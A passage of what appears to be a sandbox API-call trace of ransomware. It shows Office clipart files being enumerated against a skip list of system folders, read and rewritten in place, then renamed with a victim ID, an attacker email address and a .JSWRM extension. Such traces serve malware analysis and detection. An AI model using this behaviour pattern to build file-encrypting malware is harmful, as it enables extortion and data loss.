dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0075.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0075.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0075.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0075.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0075.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.587] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00439_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00439_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0075.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.587] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6d2045, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6d2045, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15cc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BS00440_.WMF", cAlternateFileName="")) returned 1 [0075.588] lstrcmpiW (lpString1="BS00440_.WMF", lpString2=".") returned 1 [0075.588] lstrcmpiW (lpString1="BS00440_.WMF", lpString2="..") returned 1 [0075.588] lstrcmpiW (lpString1="BS00440_.WMF", lpString2="...") returned 1 [0075.588] lstrcmpiW (lpString1="BS00440_.WMF", lpString2="windows") returned -1 [0075.588] lstrcmpiW (lpString1="BS00440_.WMF", lpString2="recovery") returned -1 [0075.588] lstrcmpiW (lpString1="BS00440_.WMF", lpString2="perflogs") returned -1 [0075.588] lstrcmpiW (lpString1="BS00440_.WMF", lpString2="documents and settings") returned -1 [0075.588] lstrcmpiW (lpString1="BS00440_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.588] lstrcmpiW (lpString1="BS00440_.WMF", lpString2="system volume information") returned -1 [0075.588] lstrcmpiW (lpString1="BS00440_.WMF", lpString2="msocache") returned -1 [0075.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0075.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00440_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00440_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00440_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0075.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0075.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00440_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00440_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00440_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0075.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.588] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00440_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.588] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5580) returned 1 [0075.588] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x15c0) returned 0x24c1d0 [0075.589] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x15c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x15c0, lpOverlapped=0x0) returned 1 [0075.590] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.590] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x15c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x15c0, lpOverlapped=0x0) returned 1 [0075.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.591] CloseHandle (hObject=0x460) returned 1 [0075.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0075.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0075.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0075.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0075.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0075.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.591] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00440_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00440_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0075.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.592] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6d2045, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6d2045, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6d2045, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdc4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BS00441_.WMF", cAlternateFileName="")) returned 1 [0075.592] lstrcmpiW (lpString1="BS00441_.WMF", lpString2=".") returned 1 [0075.592] lstrcmpiW (lpString1="BS00441_.WMF", lpString2="..") returned 1 [0075.592] lstrcmpiW (lpString1="BS00441_.WMF", lpString2="...") returned 1 [0075.592] lstrcmpiW (lpString1="BS00441_.WMF", lpString2="windows") returned -1 [0075.592] lstrcmpiW (lpString1="BS00441_.WMF", lpString2="recovery") returned -1 [0075.592] lstrcmpiW (lpString1="BS00441_.WMF", lpString2="perflogs") returned -1 [0075.592] lstrcmpiW (lpString1="BS00441_.WMF", lpString2="documents and settings") returned -1 [0075.592] lstrcmpiW (lpString1="BS00441_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.592] lstrcmpiW (lpString1="BS00441_.WMF", lpString2="system volume information") returned -1 [0075.592] lstrcmpiW (lpString1="BS00441_.WMF", lpString2="msocache") returned -1 [0075.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0075.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00441_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00441_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00441_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0075.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0075.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00441_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00441_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00441_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0075.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.592] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00441_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.593] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3524) returned 1 [0075.593] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xdc0) returned 0x24c1d0 [0075.593] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xdc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xdc0, lpOverlapped=0x0) returned 1 [0075.595] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.595] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xdc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xdc0, lpOverlapped=0x0) returned 1 [0075.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.598] CloseHandle (hObject=0x460) returned 1 [0075.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0075.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0075.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0075.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0075.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0075.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.599] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00441_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00441_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0075.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.599] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6d2045, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9b8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BS00442_.WMF", cAlternateFileName="")) returned 1 [0075.600] lstrcmpiW (lpString1="BS00442_.WMF", lpString2=".") returned 1 [0075.600] lstrcmpiW (lpString1="BS00442_.WMF", lpString2="..") returned 1 [0075.600] lstrcmpiW (lpString1="BS00442_.WMF", lpString2="...") returned 1 [0075.600] lstrcmpiW (lpString1="BS00442_.WMF", lpString2="windows") returned -1 [0075.600] lstrcmpiW (lpString1="BS00442_.WMF", lpString2="recovery") returned -1 [0075.600] lstrcmpiW (lpString1="BS00442_.WMF", lpString2="perflogs") returned -1 [0075.600] lstrcmpiW (lpString1="BS00442_.WMF", lpString2="documents and settings") returned -1 [0075.600] lstrcmpiW (lpString1="BS00442_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.600] lstrcmpiW (lpString1="BS00442_.WMF", lpString2="system volume information") returned -1 [0075.600] lstrcmpiW (lpString1="BS00442_.WMF", lpString2="msocache") returned -1 [0075.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0075.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00442_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00442_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00442_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0075.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0075.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00442_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00442_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00442_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0075.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.600] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00442_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.600] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2488) returned 1 [0075.600] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9b0) returned 0x23fc98 [0075.601] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x9b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x9b0, lpOverlapped=0x0) returned 1 [0075.602] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.602] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x9b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x9b0, lpOverlapped=0x0) returned 1 [0075.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0075.602] CloseHandle (hObject=0x460) returned 1 [0075.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0075.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0075.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0075.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0075.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0075.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.603] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00442_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft 